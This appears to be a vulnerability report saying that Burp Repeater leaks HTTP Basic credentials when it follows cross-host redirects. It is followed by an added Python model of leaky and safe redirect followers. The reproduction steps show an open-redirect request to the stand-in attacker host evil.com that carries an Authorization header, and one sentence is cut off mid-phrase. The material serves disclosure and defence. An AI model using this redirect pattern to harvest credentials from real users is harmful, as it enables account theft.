Burp Repeater leaks Platform Authentication (HTTP Basic) credentials when following redirections.
Steps to reproduce:
1. With Platform Authentication (HTTP Basic) configured in Burp for example.com, send a request to an endpoint on that host that redirects to a third-party site:

```
GET /redirect.php?url=http://evil.com HTTP/1.1
Host: example.com
```

2. Follow the redirection in Repeater. The request issued to the third-party host still carries the Platform Authentication credentials:

```
GET http://evil.com/ HTTP/1.1
Host: evil.com
Authorization: Basic dXNlcjpwYXNz
```
Note that there's nothing "unusual" about the steps to reproduce this, so it can easily happen completely by accident. On the attacker's side, exploiting this only requires logging any incoming
Burp Suite users may inadvertently send Platform Authentication credentials to unrelated third parties. This is fundamentally very sensitive information, making this a rather nasty leak.
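To make the failure mode concrete, here is an added Python model of a redirect follower (example code written for this page, not the report's or Burp's own code). It contrasts a follower that copies every header to the redirect target, which reproduces the leak described above, with one that drops credential headers when the target origin differs from the origin the credentials were configured for. The hosts example.com and evil.com and the base64 value dXNlcjpwYXNz are the report's illustrative values; the function names and the credential_leaks check are my own.

```python
from urllib.parse import urljoin, urlsplit

# Headers that carry credentials and must not cross an origin boundary
# when a redirect is followed.
CREDENTIAL_HEADERS = {"authorization", "proxy-authorization", "cookie"}


def origin(url):
    """Return (scheme, host, port) for a URL, filling in default ports."""
    p = urlsplit(url)
    port = p.port or (443 if p.scheme.lower() == "https" else 80)
    return (p.scheme.lower(), (p.hostname or "").lower(), port)


def follow_redirect(current_url, headers, location, strip_cross_origin=True):
    """Build the request a redirect follower would issue next.

    strip_cross_origin=False models the leaky behaviour in the report:
    every header, Authorization included, is copied to the new host.
    strip_cross_origin=True drops credential headers whenever the target
    origin differs from the current one (same-origin redirects keep them).
    """
    target = urljoin(current_url, location)
    cross_origin = origin(target) != origin(current_url)
    new_headers = {}
    for name, value in headers.items():
        if strip_cross_origin and cross_origin \
                and name.lower() in CREDENTIAL_HEADERS:
            continue
        new_headers[name] = value
    return target, new_headers


def credential_leaks(chain):
    """Given the ordered list of (url, headers) requests in a redirect
    chain, return (url, header_name) pairs where a credential header was
    sent to an origin other than the first request's origin."""
    if not chain:
        return []
    home = origin(chain[0][0])
    leaks = []
    for url, headers in chain[1:]:
        if origin(url) == home:
            continue
        for name in headers:
            if name.lower() in CREDENTIAL_HEADERS:
                leaks.append((url, name))
    return leaks


def demo(strip_cross_origin):
    """Replay the report's two-step scenario with constructed data and
    return any credential leaks found in the resulting chain."""
    # Constructed example mirroring the steps to reproduce above.
    # dXNlcjpwYXNz is base64("user:pass").
    first_url = "http://example.com/redirect.php?url=http://evil.com"
    first_headers = {"Host": "example.com",
                     "Authorization": "Basic dXNlcjpwYXNz"}
    # The open redirect answers with a Location of http://evil.com
    # (assumed here; the report does not show the response).
    next_url, next_headers = follow_redirect(
        first_url, first_headers, "http://evil.com", strip_cross_origin)
    next_headers["Host"] = urlsplit(next_url).hostname
    chain = [(first_url, first_headers), (next_url, next_headers)]
    return credential_leaks(chain)


if __name__ == "__main__":
    print("leaky follower:", demo(strip_cross_origin=False))
    print("safe follower: ", demo(strip_cross_origin=True))
```

The leaky follower reports the Authorization header reaching http://evil.com; the safe one reports nothing. The origin comparison (scheme, host and port, not just hostname) matters: a redirect from https://example.com to http://example.com would otherwise downgrade the credentials to cleartext. This is also what mainstream clients do: curl drops Authorization on a cross-host redirect unless --location-trusted is given, and Python's requests strips it when the redirect target host differs.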